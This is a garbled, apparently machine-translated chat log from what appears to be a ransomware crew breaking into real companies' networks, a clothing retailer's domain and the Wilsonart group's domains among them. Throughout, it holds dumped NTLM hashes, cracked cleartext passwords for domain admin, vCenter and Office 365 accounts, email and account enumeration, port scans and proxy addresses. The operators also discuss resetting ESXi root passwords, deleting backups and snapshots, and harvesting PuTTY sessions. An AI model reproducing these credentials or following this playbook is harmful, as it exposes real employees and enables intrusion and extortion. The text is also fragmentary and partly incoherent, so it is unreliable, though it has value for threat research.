there ``` >sAMAccountName: VMPro >memberOf: CN=Warehouse,OU=DressinGaudy_Users,DC=DressinGaudy,DC=local `````` [DC] 'DressinGaudy.local' will be the domain [DC] 'Gaudy-DC2.DressinGaudy.local' will be the DC server [DC] Exporting domain 'DressinGaudy.local' 1185 GAUDY-RDP1$ c4c6b3a3fa322dfb74dfb692fffb1aa54c7 532480 1119 SOCIAL-MEDIIA1$ 5f3854e8bd9d3aa5f68cb807b7891c22 4096 1114 BRITTANI-PC$ 5d8a95512df9e719207a0ed7686c417e 4096 1118 SOCIAL-MEDIA1$ cc9f2f930553c8516b2fc61f37f04910 4096 1107 CORPORATE-LAPTO$ 8bd91dcc12602c157f58b5d43b00d4ef 4096 1177 canon 8ef62adbb9127aa5cb4ddc8ceb483994 66048 1186 CORPORATE-DESKT$ 05a2b95c896aa1e365a78493f97036c0 4096 1110 QBDataServiceUser24 5c275327b45004dbb777866feacb7c44 66048 1237 QBDataServiceUser27 7e62fb7999eb74ee272401b607f1f110 66048 1147 DGLONGVIEW-PC$ e52b1d43fb366fe99fcc638a4730103b 4096 1606 GCPOS5A-LGM3 d29b9f741a059cde7e9ddfed5701ced7 66050 1605 GCPOS4A-LGM2 d29b9f741a059cde7e9ddfed5701ced7 66050 1604 GCPOS3A-LGM1 d29b9f741a059cde7e9ddfed5701ced7 66050 1234 GCPOS17A-LDG1 d29b9f741a059cde7e9ddfed5701ced7 66050 1235 GCPOS18A-LDG2 d29b9f741a059cde7e9ddfed5701ced7 66050 1610 GCPOS10A-TGM3 d29b9f741a059cde7e9ddfed5701ced7 66050 1611 GCPOS11A-CDG1 d29b9f741a059cde7e9ddfed5701ced7 66050 1612 GCPOS12A-CDG2 d29b9f741a059cde7e9ddfed5701ced7 66050 1613 GCPOS13A-CDG3 d29b9f741a059cde7e9ddfed5701ced7 66050 1601 GCPOS1A-TDG1 d29b9f741a059cde7e9ddfed5701ced7 66050 1603 GCPOS2A-TDG2 d29b9f741a059cde7e9ddfed5701ced7 66050 1607 GCPOS6A-TXDG1 d29b9f741a059cde7e9ddfed5701ced7 66050 1608 GCPOS7A-TXDG2 d29b9f741a059cde7e9ddfed5701ced7 66050 1609 GCPOS8A-TGM1 64f12cddaa88057e06a81b54e73b949b 66050 1602 GCPOS9A-TGM2 d29b9f741a059cde7e9ddfed5701ced7 66050 1210 allisonp 47b178d121cd3bab2192988418dfc888 66050 1217 social 48ae08e40717fc5d1075610f5a6d14f0 66048 1220 order 64ad7b9e2614ff9b9082025ff12976fe 66050 1229 sabrinah 48ae08e40717fc5d1075610f5a6d14f0 66050 502 krbtgt 231b0468e1c72213ef935e8cb4b4906f 514 1113 QBPOSDBSrvUser 
90d145e86ae9f78a6e61d1fec6cfbb5f 66048 1214 ROOK 0d1d3a9a35ad2c91b12b9e0a9a9a83e169 66050 1219 Shopthegaudysite 64ad7b9e2614ff9b9082025ff12976fe 66050 1197 receiving2 3be8bfea417bb754d098159f04dbc239 66050 1244 VMPro d5d2270b5b056635450ab6139ff44db9 66048 1222 Careers 64ad7b9e2614ff9b9082025ff12976fe 66048 1221 admin 64ad7b9e2614ff9b9082025ff12976fe 66048 1146 jpu c6e4af5358661caf7a1e5d5a1d7f771b 66048 1241 gaudy 72bb5d55d77daf7721d92f80974a716d4 66048 1161 ncp fe64f8d8957e7236a923810afc8002c4 66048 1188 Info 41c3a27426f8b504ddcdc54dbf9ac6e3 66048 1215 sales 64ad7b9e2614ff9b9082025ff12976fe 66048 1223 orders ec659a6bff5d09327e805a2faf06fc94 66048 1239 orders 64f12cddaa88057e06a81b54e73b949b 66048 1157 hbt bbd870afdcc36d200a739c193eed5e6d 66048 1216 CustomerService ec659a6bff5d09327e805a2faf06fc94 66048 1159 klm b1677919e2aa45ba57959305e76a5946 66048 2105 grantp fdb219f9e944f46ef3aeec0686917e86 66048 503 DefaultAccount 31d6cfe0d16ae931b73c59d7e0c089c0 514 1195 SOCIALMEDIA1$ c83ce529704a20e431c48e000caaf0cb 4096 1168 SOCIALMEDIA3$ dfd33f42d4cfe4263069b1520ab2d898 4096 1616 MIKALAPTOP$ dc8b3717fe624123307cc1cea924b7b6 4096 1238 CORPORATE2$ e842adcc65fb28f339df23841037da51 4096 1236 madisonc 989a6a62caf5177d82ae02ba3c9c0eb0 66050 1192 GM103 ff6baa1584e0f920a1224947ee436067 66048 1108 emm 9ef20ca8484efe69a7197730a9b8badc 66048 1231 LeahP b080b686db8076775a51272b8a07f419 66050 2117 cooperm 81cd9c07ca5bdc15ed2dde1d45cccef7 66048 1242 QBDataServiceUser28 f9afe04ed33db257f4f6e4a126aa6003 66048 2118 QBDataServiceUser29 560e002747f32bf8dc26005978fefa3e 66048 1240 kaylab 285da02342607559528b49ae60d909b3 66048 1233 DG108 ece4a880865e765d57733539931b334b 66048 1191 GM106 3ea7b213b7e25cc0cce68803303952b5 66048 1155 bdc 872d591814c3eb168a120d4067888885 66048 1619 GCPOS16A$ 9997926294c6ee5932a5ebd94f0f8355 4096 1218 Breer efa36a734a1aba14b95bcd0f9ceb1610 66048 1194 MeaganC 662ce6b8aa70d5ed8f96b25d98c3743b 66048 1000 GAUDY-DC1$ 02fab4f0918492e698ae8b519a992fa7 4096 2106 SOCIAL3$ 
517ab1040e57c71cdd9eb021318335e2 4096 1106 jmr 554193c8030f36f98504a0fdfb63b3ba 66048 1224 DG-TYLER-OFFICE$ 147e9e3fd70aa5f9fe99c9880199e543 4096 2114 socialmedia3 d14687e5eebe9af70f2e30d49f4759ea 66048 1227 GCPOS15A$ 4f87b85d2fb489f3f4cd927d51d85d06 4096 1190 DG102 2c5c4e9f4ba709322f13f7df92619dd6 66048 1226 GCPOS14A$ 774454456817213d7882483d4eb3f910 4096 1620 POS14 64f12cddaa88057e06a81b54e73b949b 66048 2115 MackenziD 87c7bec5244e04ff5286b332f7a534dd 66048 1621 pos15 64f12cddaa88057e06a81b54e73b949b 66048 1622 POS16 64f12cddaa88057e06a81b54e73b949b 66048 1109 JENIRAMSEY-PC$ 837dadb16d5fbe52eeb431e871bbfd6a 4096 1193 DG105 a733b31bc8855948eef5217fb77e6837 66048 2121 kimw 8908a802d83a41c2178c47dbb53cf1c1 66048 1163 texarkana a733b31bc8855948eef5217fb77e6837 66048 1618 DG-TEX-OFFICE$ 878b13be8f93134e0f115ee09d0dfdd8 4096 2120 larkinp 8837daf55148dcc8352a67b761c37e8e 66048 1617 SHIPPING$ 02c10a5073b82fe6782582a3ddea72f8 4096 1245 OWNER-PC$ 70cad180b2e3f00380211e955197dd43 4096 1230 DGLongview ece4a880865e765d57733539931b334b 66048 1160 longview ff6baa1584e0f920a1224947ee604367 66048 1170 corporate 91631b2dba583d2133168dcefa82bc63 66048 1614 CORPORATE$ 6927c73ce468477e647563063937f2b4 4096 2113 clittleton 5f2f93f575aef31552177a4e70b4980e 66048 1202 sharies 866f661b57f5f233e10fdd1569980c44 66048 2125 meganl 5965d4ddc4bde0f6fcb32fb07a1a625b 66048 2122 teresac 78b5fb4330f3807604e449a52af8b5ad 66050 2108 SOCIAL2$ 5cc5391f1c26ff59544b474f47ef0477 4096 1165 socialmedia1 933062fa0aee8303a48f070887208732 66048 2107 SOCIAL1$ 47a04b5e303b009aa595cd47f47eb7ab 4096 2126 QBDataServiceUser31 894d6d5d1a0478e345d2e6f07cfdd779 66048 2123 cindyh e2e9a2a7db389a08cfbfc8be07d6d989 66048 2111 Rockwall a3498136f2eb7322d7589605346386c5 66048 2112 ROCKWALL-BACKOF$ edb60636f3d2fc8581decf3a360ccb2f 4096 1615 RECEIVING$ f7610b6b98fe11093b08652cb4274bac 4096 2119 magenl 5965d4ddc4bde0f6fcb32fb07a1a625b 66048 1228 website 0bd318c29d9542e09abbee52463a46fb 66048 2109 Katelync 
9647b5f0f1136f99333939a3373f0899 66048 1207 Label 873e50fd637d0d3ded9af361d32d8d62 66048 1199 label 81cd9c07ca5bdc15ed2dde1d45cccef7 66048 1243 GAUDY-DC2$ f57e713d19f3c2f5e24627014549951e 532480 1225 GM-TYLER-OFFICE$ fef8461129278327173160d4a2a4d01c 4096 2124 destineeg bd3d4fbd9e1f03c50106eeee4b54823c 66048 500 Administrator 2bebaecfce9530051a337ca7a299c71c 512 1145 dat 5e481f285545336512794748d10e16b9 66048 1123 MIKADESKTOP$ 903fe4d75fb8fe136d1ff892860704f3 4096 1121 socialmedia2 60cafefefc6658a34bc7032d29f7614032 66048 1122 LABEL$ f2790a191d89f81727076a650bdba797 4096 1623 DGW-PC$ f7faedbd9e2968e9b9421fc4d8c80662 4096 1153 dg 2c5c4e9f4ba709322f13f7df92619dd6 66048 1117 ACCOUNTING2$ 9bdded5eb425b9a551ca0277086f2d01 4096 1164 tyler 3ea7b213b7e25cc0cce68803303952b5 66048 1148 tim 0746a084694c267c15fe9c1081b05cf9 66048 1175 canton 399f140089c0e3d11c7b8267d11eb011 66048 ``3 in quotation marks is ``` GAUDY-RDP1.DressinGaudy.local Gaudy-DC2.DressinGaudy.local "`` Gaudy-DC1.DressinGaudy.local'' ``` 1 and 2 on the same IP "3" ``Destination host unreachable.`` It's not "3" servers and by the way don't keep one session if it's dropping...so go somewhere else to rerisk it, there was such a thing last time >request ad_ous or ad_group - the session crashes ignore them or reset? probably clean the toolspanel last time also reset and what do you do? right? i'll reset dsink, hell, check again for backups and can close in principle, if the latter is not detected at once does not work, dohda ``` DressinGaudy\canton GMC041985 `````` DressinGaudy.local ``update info to net domainDGW-PC? let's silkcodnoe koba that's not there I think I put in a long slip do you have a session here? 
need to check the ping as far as I remember there are no backups at all it just get injected so you could then close@user8 call you so there's a small fucked up grid and it should be, but here is a couple>mail: VMPro@gaudyme.com``` >proxyAddresses: SMTP:Administrator@gaudyme.com >proxyAddresses: smtp:Administrator@dressingaudy.local >userPrincipalName: Administrator@DressinGaudy.local >mail: Administrator@gaudyme.com >userPrincipalName: POS14@DressinGaudy.local >userPrincipalName: POS16@DressinGaudy.local >userPrincipalName: pos15@DressinGaudy.local >userPrincipalName: GCPOS4A-LGM2@DressinGaudy.local >proxyAddresses: SMTP:tim@gaudyme.com >proxyAddresses: smtp:tim@dressingaudy.local >userPrincipalName: tim@DressinGaudy.local >mail: tim@gaudyme.com >userPrincipalName: GCPOS11A-CDG1@DressinGaudy.local >userPrincipalName: GCPOS10A-TGM3@DressinGaudy.local >userPrincipalName: GCPOS18A-LDG2@DressinGaudy.local >userPrincipalName: GCPOS9A-TGM2@DressinGaudy.local >userPrincipalName: DG108@DressinGaudy.local >userPrincipalName: GCPOS2A-TDG2@DressinGaudy.local >userPrincipalName: GCPOS12A-CDG2@DressinGaudy.local >proxyAddresses: SMTP:longview@gaudyme.com >proxyAddresses: smtp:longview@dressingaudy.local >userPrincipalName: longview@DressinGaudy.local >mail: longview@gaudyme.com >userPrincipalName: GM106@DressinGaudy.local >userPrincipalName: DG102@DressinGaudy.local >userPrincipalName: GCPOS13A-CDG3@DressinGaudy.local >proxyAddresses: smtp:accounting@gaudyme.com >proxyAddresses: smtp:david@gaudyme.com >proxyAddresses: SMTP:jeni@gaudyme.com >proxyAddresses: smtp:jeni@dressingaudy.local >userPrincipalName: jmr@DressinGaudy.local >mail: jeni@gaudyme.com >userPrincipalName: GCPOS6A-TXDG1@DressinGaudy.local >userPrincipalName: GCPOS1A-TDG1@DressinGaudy.local >proxyAddresses: smtp:canton@dressingaudy.local >proxyAddresses: SMTP:canton@gaudyme.com >userPrincipalName: canton@DressinGaudy.local >mail: canton@gaudyme.com >userPrincipalName: ROOK@DressinGaudy.local >proxyAddresses: 
SMTP:brianna@gaudyme.com >proxyAddresses: smtp:brianna@dressingaudy.local >userPrincipalName: bdc@DressinGaudy.local >mail: brianna@gaudyme.com >userPrincipalName: GCPOS17A-LDG1@DressinGaudy.local >userPrincipalName: GCPOS3A-LGM1@DressinGaudy.local >userPrincipalName: DG105@DressinGaudy.local >userPrincipalName: GCPOS5A-LGM3@DressinGaudy.local >proxyAddresses: SMTP:Breer@gaudyme.com >proxyAddresses: smtp:Breer@dressingaudy.local >userPrincipalName: Breer@DressinGaudy.local >mail: Breer@gaudyme.com >userPrincipalName: GCPOS7A-TXDG2@DressinGaudy.local >proxyAddresses: smtp:corporate@dressingaudy.local >proxyAddresses: SMTP:corporate@gaudyme.com >userPrincipalName: corporate@DressinGaudy.local >mail: corporate@gaudyme.com >userPrincipalName: GM103@DressinGaudy.local >userPrincipalName: GCPOS8A-TGM1@DressinGaudy.local >proxyAddresses: SMTP:FederatedEmail.4c1f4d8b-8179-4148-93bf-00a95fa1e042@gaudyme.com >proxyAddresses: smtp:FederatedEmail.4c1f4d8b-8179-4148-93bf-00a95fa1e042@dressingaudy.local >userPrincipalName: FederatedEmail.4c1f4d8b-8179-4148-93bf-00a95fa1e042@DressinGaudy.local >mail: FederatedEmail.4c1f4d8b-8179-4148-93bf-00a95fa1e042@gaudyme.com >proxyAddresses: SMTP:SystemMailbox{1f05a927-8705-43d0-94dd-0810ef6db452}@gaudyme.com >proxyAddresses: smtp:SystemMailbox{1f05a927-8705-43d0-94dd-0810ef6db452}@dressingaudy.local >userPrincipalName: SystemMailbox{1f05a927-8705-43d0-94dd-0810ef6db452}@DressinGaudy.local >mail: SystemMailbox{1f05a927-8705-43d0-94dd-0810ef6db452}@gaudyme.com >proxyAddresses: SMTP:SystemMailbox{e0dc1c29-89c3-4034-b678-e6c29d823ed9}@gaudyme.com >proxyAddresses: smtp:SystemMailbox{e0dc1c29-89c3-4034-b678-e6c29d823ed9}@dressingaudy.local >userPrincipalName: SystemMailbox{e0dc1c29-89c3-4034-b678-e6c29d823ed9}@DressinGaudy.local >mail: SystemMailbox{e0dc1c29-89c3-4034-b678-e6c29d823ed9}@gaudyme.com >proxyAddresses: SMTP:DiscoverySearchMailbox{D919BA05-46A6-415f-80AD-7E09334BB852}@gaudyme.com >proxyAddresses: 
smtp:DiscoverySearchMailbox{D919BA05-46A6-415f-80AD-7E09334BB852}@dressingaudy.local >userPrincipalName: DiscoverySearchMailbox {D919BA05-46A6-415f-80AD-7E09334BB852}@DressinGaudy.local >mail: DiscoverySearchMailbox{D919BA05-46A6-415f-80AD-7E09334BB852}@gaudyme.com >proxyAddresses: SMTP:debbie@gaudyme.com >proxyAddresses: smtp:debbie@dressingaudy.local >userPrincipalName: dat@DressinGaudy.local >mail: debbie@gaudyme.com >proxyAddresses: SMTP:dg@gaudyme.com >proxyAddresses: smtp:dg@dressingaudy.local >userPrincipalName: dg@DressinGaudy.local >mail: dg@gaudyme.com >proxyAddresses: SMTP:holly@gaudyme.com >proxyAddresses: smtp:holly@dressingaudy.local >userPrincipalName: hbt@DressinGaudy.local >mail: holly@gaudyme.com >proxyAddresses: SMTP:johnie@gaudyme.com >proxyAddresses: smtp:johnie@dressingaudy.local >userPrincipalName: jpu@DressinGaudy.local >mail: johnie@gaudyme.com >proxyAddresses: SMTP:kyli@gaudyme.com >proxyAddresses: smtp:kyli@dressingaudy.local >userPrincipalName: klm@DressinGaudy.local >mail: kyli@gaudyme.com >proxyAddresses: SMTP:mika@gaudyme.com >proxyAddresses: smtp:mika@dressingaudy.local >userPrincipalName: emm@DressinGaudy.local >mail: mika@gaudyme.com >proxyAddresses: SMTP:naia@gaudyme.com >proxyAddresses: smtp:naia@dressingaudy.local >userPrincipalName: ncp@DressinGaudy.local >mail: naia@gaudyme.com >proxyAddresses: SMTP:texarkana@gaudyme.com >proxyAddresses: smtp:texarkana@dressingaudy.local >userPrincipalName: texarkana@DressinGaudy.local >mail: texarkana@gaudyme.com >proxyAddresses: SMTP:tyler@gaudyme.com >proxyAddresses: smtp:tyler@dressingaudy.local >userPrincipalName: tyler@DressinGaudy.local >mail: tyler@gaudyme.com >proxyAddresses: smtp:Info@dressingaudy.local >proxyAddresses: SMTP:Info@gaudyme.com >userPrincipalName: Info@DressinGaudy.local >mail: Info@gaudyme.com >userPrincipalName: canon@DressinGaudy.local >proxyAddresses: smtp:Receiving2@dressingaudy.local >proxyAddresses: SMTP:Receiving2@gaudyme.com >userPrincipalName: 
receiving2@DressinGaudy.local >mail: Receiving2@gaudyme.com >proxyAddresses: smtp:receiving@dressingaudy.local >proxyAddresses: SMTP:receiving@gaudyme.com >userPrincipalName: receiving1@DressinGaudy.local >mail: receiving@gaudyme.com >proxyAddresses: SMTP:sharies@gaudyme.com >proxyAddresses: smtp:sharis@gaudyme.com >proxyAddresses: smtp:sharies@dressingaudy.local >proxyAddresses: smtp:sharis@dressingaudy.local >userPrincipalName: sharies@DressinGaudy.local >mail: sharies@gaudyme.com >userPrincipalName: Label@DressinGaudy.local >userPrincipalName: allisonp@DressinGaudy.local >mail: allisonp@gaudyme.com >proxyAddresses: smtp:social3@gaudyme.com >proxyAddresses: SMTP:katies@gaudyme.com >proxyAddresses: smtp:social3@dressingaudy.local >userPrincipalName: MeaganC@DressinGaudy.local >mail: meaganc@gaudyme.com >proxyAddresses: smtp:CustomerService@gaudyme.com >proxyAddresses: SMTP:customerservice@shopthegaudy.com >proxyAddresses: smtp:CustomerService@dressingaudy.local >userPrincipalName: CustomerService@DressinGaudy.local >mail: customerservice@shopthegaudy.com >proxyAddresses: smtp:sales@gaudyme.com >proxyAddresses: SMTP:sales@shopthegaudy.com >proxyAddresses: smtp:sales@dressingaudy.local >userPrincipalName: sales@DressinGaudy.local >mail: sales@shopthegaudy.com >proxyAddresses: smtp:Social@dressingaudy.local >proxyAddresses: SMTP:Social@gaudyme.com >userPrincipalName: Social@DressinGaudy.local >mail: Social@gaudyme.com >proxyAddresses: SMTP:Shopthegaudysite.orders@shopthegaudy.com >proxyAddresses: smtp:Shopthegaudysite@dressingaudy.local >userPrincipalName: Shopthegaudysite@DressinGaudy.local >mail: Shopthegaudysite.orders@shopthegaudy.com >proxyAddresses: smtp:order@dressingaudy.local >proxyAddresses: SMTP:order@gaudyme.com >userPrincipalName: order@DressinGaudy.local >mail: order@gaudyme.com >proxyAddresses: SMTP:admin@shopthegaudy.com >proxyAddresses: smtp:admin@dressingaudy.local >userPrincipalName: admin@DressinGaudy.local >mail: admin@shopthegaudy.com 
>proxyAddresses: SMTP:Careers@shopthegaudy.com >proxyAddresses: smtp:Careers@dressingaudy.local >userPrincipalName: Careers@DressinGaudy.local >mail: Careers@shopthegaudy.com >proxyAddresses: smtp:orders@gaudyme.com >proxyAddresses: SMTP:orders@shopthegaudy.com >proxyAddresses: smtp:orders@dressingaudy.local >userPrincipalName: orders@DressinGaudy.local >mail: orders@shopthegaudy.com >proxyAddresses: smtp:DGLongview@dressingaudy.local >proxyAddresses: SMTP:DGLongview@gaudyme.com >userPrincipalName: DGLongview@DressinGaudy.local >mail: DGLongview@gaudyme.com >proxyAddresses: smtp:LeahP@dressingaudy.local >proxyAddresses: SMTP:LeahP@gaudyme.com >userPrincipalName: LeahP@DressinGaudy.local >mail: LeahP@gaudyme.com >proxyAddresses: smtp:madisonc@dressingaudy.local >proxyAddresses: SMTP:madisonc@gaudyme.com >userPrincipalName: madisonc@DressinGaudy.local >mail: madisonc@gaudyme.com >userPrincipalName: sabrinah@DressinGaudy.local >mail: sabrinah@gaudyme.com >proxyAddresses: smtp:scanning@dressingaudy.local >proxyAddresses: SMTP:scanning@gaudyme.com >userPrincipalName: scanning@DressinGaudy.local >mail: scanning@gaudyme.com >proxyAddresses: smtp:kaylab@dressingaudy.local >proxyAddresses: SMTP:kaylab@gaudyme.com >userPrincipalName: kaylab@DressinGaudy.local >mail: kaylab@gaudyme.com >proxyAddresses: smtp:gaudy@gaudyme.com >proxyAddresses: SMTP:Gaudy@shopthegaudy.com >proxyAddresses: smtp:gaudy@dressingaudy.local >userPrincipalName: gaudy@DressinGaudy.local >mail: Gaudy@shopthegaudy.com >userPrincipalName: socialmedia2@DressinGaudy.local >userPrincipalName: website@DressinGaudy.local >userPrincipalName: socialmedia1@DressinGaudy.local >proxyAddresses: smtp:VMPro@dressingaudy.local >proxyAddresses: SMTP:VMPro@gaudyme.com >userPrincipalName: VMPro@DressinGaudy.local >mail: VMPro@gaudyme.com >userPrincipalName: grantp@DressinGaudy.local >userPrincipalName: Katelync@DressinGaudy.local >userPrincipalName: Rockwall@DressinGaudy.local >userPrincipalName: 
clittleton@DressinGaudy.local >userPrincipalName: socialmedia3@DressinGaudy.local >userPrincipalName: MackenziD@DressinGaudy.local >userPrincipalName: cooperm@DressinGaudy.local >userPrincipalName: magenl@DressinGaudy.local >userPrincipalName: larkinp@DressinGaudy.local >userPrincipalName: kimw@DressinGaudy.local >userPrincipalName: teresac@DressinGaudy.local >userPrincipalName: cindyh@DressinGaudy.local >userPrincipalName: destineeg@DressinGaudy.local >userPrincipalName: meganl@DressinGaudy.local ``Add users has no direct domain without a .local3 server and how should I know?) why laba then? because we never understood@tl2 is laba or not? https://vmblog.ru/sbros-paroyal-root-v-vmware-esxi/ Is there a way to reset a password in the sphere? in the serviceenu the root password, maybe this account is used somewhere and how it can fall down? I think that if the network does not fall down, it may be worth just resetting passwords from the sphere on the icesxxes in crisp, not much so far looking for icesx cres, they only go there by cc, passwords are not stored( also, it is possible that something started backing up in amazon backup, because there was an icon on the desktop of the admin vobechel pochekal its email, he writes part of the servers restored and some could not, went to a link from the note) And on some servers have put kaspersky anti-ransomeware tool what progress? not today, rebound@tl1 what about new sessions ?DecryptPwd seems to yank from the path, if not confused look it up putty HKCU\Software\SimonTatham\PuTTY\Sessions recursive search for *.ppk up to 3rd level in %USERPROFILE%\Documents %USERPROFILE%\.ssh %USERPROFILE%\Downloads HKCU\Software\SimonTatham\PuTTY\Sessions ``but 2 minnu it doesn't retrieve passwords as far as i know there's a psh script on gita but it doesn't work is there anything to get passwords or sessions from putty? 
except goferokJR after 8 new sessions[ ](https://mediaeveryone.com/channel/general?msg=3BYaoa6CeJXwy8Aat) came up, thanks a lot but the builds are fresh on gita is there a latest version of mimic ?while deafshelcode[ ](https://mediaeveryone.com/channel/general?msg=B6SAQCaZw4TTtKhGQ) yes, come on she> there is an article how on esh from sphere reset the ruth password not in the kurseda by the way, balimore are backBeremore have sessionsTL2 will be today? I wanted to ask him, maybe something washed up on the cessation of televisa? there's an article on how to reset the root password from the sphere it may be worth a try? or the virtuals will fall down? there are sessions while i monitor the admin have to look for eshs what are you doing? ``` Force user logoff how long after time expires?: Never Minimum password age (days): 1 Maximum password age (days): 90 Minimum password length: 7 Length of password history maintained: 12 Lockout threshold: 5 Lockout duration (minutes): 30 Lockout observation window (minutes): 30 Computer role: WORKSTATION ``LA ``` Administrator UNIVERSE\Domain Admins UNIVERSE\ITHelper-STC UNIVERSE\SystemServiceAccounts EA ``` Administrator brettb.admin brian.admin harrison.admin josephy.admin jwahoff.admin kuelker.admin2 MSOL_635e0c1d0736 shao.admin sweeneyadmin2 ``YES ``` adfssync administrator alanj.admin austinh.admin brettb.admin brian.admin chuck ericj.admin everestsrv harrison.admin insightidr josephy.admin jradmin jwahoff.admin keith.admin kuelker.admin2 loggerx manning.admin nexposescan prtglog shao.admin spps2007 ssoadfs sweeneyadmin2 viveros.admin `````` WILSONART\Administrator {}wallC2013 ``not everyone can see each other either,`` Wilsonart.com srv: 141 arm: 2587 ``the small ones see each other? ``` The trust relationship between the primary domain and the trusted domain failed. `````` polyrey.net\Administrator Password1 ``See one large domain? Domains BEFORE 30 servers. 
Number of Computers by AD: Wilsonart.com srv: 141 arm: 2587 uk.Wilsonart.com srv: 25 arm: 157 eu.Wilsonart.com srv: 43 arm: 10 uk.Wilsonart.com srv: 1 WI.RWP.COM srv: 60 arm: 515 TECHNISTONE.LOCAL srv: 42 arm: 253 SLF.LOCAL srv: 10 arm: 66 resopal.lan srv: 27 arm: 100 ralpwilson.com srv: 1 polyrey.net srv: 64 arm: 340 BUSHBOARD.CO.UK srv: 17 arm: 136 arborite.com srv: 12 arm: 154 ``give status on domains how many pc's and serverostalnym sees the head domain does not see the two domains we have a domain that sees everything? I don't know Tl2 says it can, so maybe if you can share drives they will see? I honestly have a hard time with the point that the software itself knows how to identify disks in europe left to find We need to discuss what to do with such a large network What to do with armas? we want to ping that pings there is a scpreet that checks all drives and important processes and from the servers the cipher will reach the armies And then we ping the armies. >dNSHostName: VIPW7700.resopal.lan >description: virtuell auf VMware (Win 10) 172.22.198.250:22 (SSH-2.0-U_fcWc) `````` gutemine ``sek@tl2@tl1mozhno etot pls ``` resopal\Administrator 8525195ec813eddb16f538c3a9b8f68e ``There is one, european yes with processes kipassatachka found? no password was there? I took out of the mail in memory? password is required? no) and you opened it? can we do something with kipass .kdbx? though no, bullshit aiipshniki like what from where and why? ``` kemp2 25228f174278a82e7202a25df2d9923b 1) in the america snaps they do not seem to store, back them up and delete them immediately there is access to snapshots nadov eu, if it is on the winndea is there any point in looking for the creed from the spherenay for whichspasnu I wrote 2 and 31 no2) Polyrey70 3) Louanne50[ ](https://mediaeveryone.com/group/wilsonart-com?msg=uzeoMWGyycXHP7cXz) @tl1`99Lustballons! 
``` Chang 0aecf72f2e69f9e56672f4a9ffc9b653 `````` bod01-vce01.eu.wilsonart.com bod01.svc.vcenter@eu.Wilsonart.com Jupit3r= ``Second ``Netz_1020``[ ](https://mediaeveryone.com/group/wilsonart-com?msg=JsFqGZhSJQ7nrEcXc) .yes, what else do you need? ``The last one is who```Jupit3r=`eu.Wilsonart.com`` ``` >sAMAccountName: bod01.svc.vcenter 010a5c70e9d2c4a433bb446137e24bcd ``` this one on kmd5 also passed ``eu.wilsonart.com ``` >sAMAccountName: Luka_Blerim >description: AD Mitarbeiter Polyrey PW: Sommer2016 >memberOf: CN=Dir-Marketing_Update,OU=Security_Groups,OU=Groups,OU=Resopal,OU=_Germany,DC=eu,DC=Wilsonart,DC=com >memberOf: CN=ADMigGrp,OU=Security_Groups_administrative,OU=Groups,OU=Resopal,OU=_Germany,DC=eu,DC=Wilsonart,DC=com ````eu.Wilsonart.com`` ``` >sAMAccountName: BackupExec >description: Administratoraccount fuer BackupExec 08e2fc16edd1c5d4b37ac32bc029877f ``` ``` >sAMAccountName: BackupExecDedup >description: Administratoraccount fuer den BackupExec Deduplizierungsordner 08e2fc16edd1c5d4b37ac32bc029877f ``` ``` >sAMAccountName: svcveeam >memberOf: CN=Backup Operators 0e7674530ce330128b4425c70fb97f92 ````resopal.lan ``` >sAMAccountName: BackupExec >description: Administratoraccount fuer BackupExec >memberOf: CN=Backup Operators,CN=Builtin,DC=resopal,DC=lan 08e2fc16edd1c5d4b37ac32bc029877f ``` ``` >sAMAccountName: Metzler >description: Systemadministrator >memberOf: CN=Backup Operators 30010b62fbd26d564f675f307be39e34 ``` ``` >sAMAccountName: BackupExecDedup 08e2fc16edd1c5d4b37ac32bc029877f ``` ``` >sAMAccountName: Meyer >description: Ausgeschieden am 31.07.BC0; --> shared Mailbox! 
>memberOf: CN=Backup Operators 643a5b0efe1d2372327b2dbf5f2a4ffb ``` ``` >sAMAccountName: Chang >description: Systemadministrator >memberOf: CN=Backup Operators 0aecf72f2e69f9e56672f4a9ffc9b653 ``` The second and the last one on kmd5 passedMaybe the clears from 2 and 3 ``` polyrey\Cavaille e0cf42dded1fbbb9a008834ecd2b8c27 polyrey\Grellety e86e6c5f19915009b3c65492416e1f62 polyrey\Blanchard 6e51b128879e247c4491c4ab182f2b9e ``` ``CN=Admin_VCENTER`` - there is one dk and that's it, on going to the site here is this horror from 2003 in two domains, in ad comp only dk, no comps, no servers there are subsnets - 445 gives out comps from the main domain are these some planned / test domains? snapshots are made, exported to backup and deleted backups are stored on winserv)` Azerty02 `this one 02f1aac45c8eba915ba76df951e7ef04 Grelles2 ``Azerty02 this one`` cc25135efc9f3a2b14fa789ced1728ce ### Eyes in a bunch ### I'm not @tl2, but I'll throw in #Chloe2019#@tl2, send me the hash ### ``` blanchp2 43711ca9520253e475fbd9a32b18317b ``Herbst2018sphere ``` fowlerh@wilsonart.com R3f1nn3j2! `````` admin pRe1Udlp!-symantec `````` * Username : fowlerh@wilsonart.com * Domain : outlook.office365.com * Password : R3f1nn3j2! 
`````` setg Proxies socks4:199.127.61.214:1488 ``170.7.76.79esx ``` drpvw01.wilsonart.com ``another sphere ``` dcvcsa01.wilsonart.com `````` >description: VMware vCenter 6.0 Server >operatingSystem: Windows Server 2012 R2 Datacenter >dNSHostName: dcwas79.Wilsonart.com Share name Type Used as Comment ---------------------------------------- ADMIN$ Disk Remote Admin C$ Disk Default share D$ Disk Default share IPC$ IPC Remote IPC >description: Veeam Backup Server >operatingSystem: Windows Server 2016 Standard >dNSHostName: dcveeam01.Wilsonart.com Share name Type Used as Comment ---------------------------------------- ADMIN$ Disk Remote Admin C$ Disk Default share F$ Disk Default share IPC$ IPC Remote IPC >description: Symantec End Point Management Server >operatingSystem: Windows Server 2012 Standard >dNSHostName: DCWAS45.Wilsonart.com Share name Type Used as Comment ------------------------------------------ ADMIN$ Disk Remote Admin C$ Disk Default share IPC$ IPC Remote IPC print$ Disk Printer Drivers >description: PROD Symantec AntiVirus Management Server >operatingSystem: Windows Server 2012 Standard >dNSHostName: FLWAS03.Wilsonart.com net view \FLWAS03.Wilsonart.com /all System error 53 has occurred. The network path was not found. Ping statistics for 170.7.20.198: Packets: Sent = 4, Received = 4, Lost = 0 (0% loss), 170.7.20.198:53161 170.7.20.198:49154 170.7.20.198:49153 170.7.20.198:9090 170.7.20.198:8446 170.7.20.198:8445 170.7.20.198:8443 170.7.20.198:8014 170.7.20.198:8008 170.7.20.198:8006 170.7.20.198:5985 170.7.20.198:5060 170.7.20.198:3389 170.7.20.198:2000 170.7.20.198:1611 170.7.20.198:1610 170.7.20.198:1100 170.7.20.198:143 170.7.20.198:139 170.7.20.198:135 170.7.20.198:110 170.7.20.198:80 170.7.20.198:25 170.7.20.198:21 >description: Vcenter Server >dNSHostName: 